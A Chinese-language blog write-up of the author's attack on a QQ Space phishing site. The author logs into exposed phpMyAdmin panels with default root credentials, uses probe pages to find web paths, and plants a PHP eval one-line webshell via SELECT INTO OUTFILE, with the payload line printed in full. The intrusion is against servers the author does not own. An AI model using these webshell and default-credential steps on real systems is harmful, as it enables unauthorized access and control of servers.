渗透实战之QQ空间钓鱼网站

0x00 前言

打开邮箱,发现垃圾箱里躺着一封垃圾邮件

一看就是钓鱼邮件,话不多说,搞他。

没什么技术含量,看看就好。

0x01 渗透过程

第一部分

直接打开链接

除了登陆可以点击,其他超链接都是假的,也太不敬业了。

然后发现地址栏域名和垃圾邮箱里面的给的链接的域名不一样,
是跳转过去的,遂访问初始的域名。

打开一看,phpStudy 探针 2014 页面。

phpstudy 探针 可以测试 数据库连接,试试看弱口令,phpstudy数据库默认账号密码root
测试成功。

然后尝试登陆phpmyadmin

直接访问url+/phpMyAdmin/,使用测试成功的弱口令登陆。

数据库里面没什么东西,因为在探针页面知道了物理路径,所有直接写一句话木马,连接之。

select '<?php @eval($_POST[pass]);?>' into outfile 'D:/phpstudy/WWW/test.php';

这个服务器里面啥都没有,只有几个用来跳转连接的php文件,
就回到开头,继续搞qq钓鱼网站的。

第二部分

QQ钓鱼站的后台,找了一圈没找到。

访问一个不存在的文件,提示页面如下图
发现是用UPUPW搭建的,猜测会不会也有phpmyadmin

尝试访问url+/phpMyAdmin/ ,返回 404

又尝试访问url+/pmd/,成了

尝试弱口令成功登陆

准备写入一句话木马,不知道物理路径。
使用语句

select @@basedir

然后尝试在upupw默认网站路径下写入木马
提示:(Errcode: 2 "No such file or directory")
写入失败,文件夹不存在

然后又尝试了其他路径名,均以失败告终
一筹莫展之际,
想到upupw会不会也有探针页面,会不会没删?
百度之,upupw默认的探针页面是u.php,
尝试访问

得到网站物理路径,然后又是愉快的上木马连接了。

参考文章

PhpMyAdmin 网站路径信息获取
总结下写phpmyadmin写shell的方法
phpmyadmin getshell姿势 - 先知社区


   转载规则


《渗透实战之QQ空间钓鱼网站》 dylan 采用 知识共享署名 4.0 国际许可协议 进行许可。
 上一篇
HTB(Hack The Box)系列—入门指南 HTB(Hack The Box)系列—入门指南
0x00 前言0x01 注册登陆注册需要邀请码 快速获取邀请码方法一首先打开邀请界面 https://www.hackthebox.eu/invite 按下F12,打开Console输入如下代码执行 $.post('https:/
2019-12-02
下一篇 
Apache Flink 任意 Jar 包上传致 RCE 漏洞复现 Apache Flink 任意 Jar 包上传致 RCE 漏洞复现
0x00 漏洞概述Flink核心是一个流式的数据流执行引擎,其针对数据流的分布式计算提供了数据分布、数据通信以及容错机制等功能。基于流执行引擎,Flink提供了诸多更高抽象层的API以便用户编写分布式任务。可部署在各种集群环境,对各种大小的
2019-11-17
  目录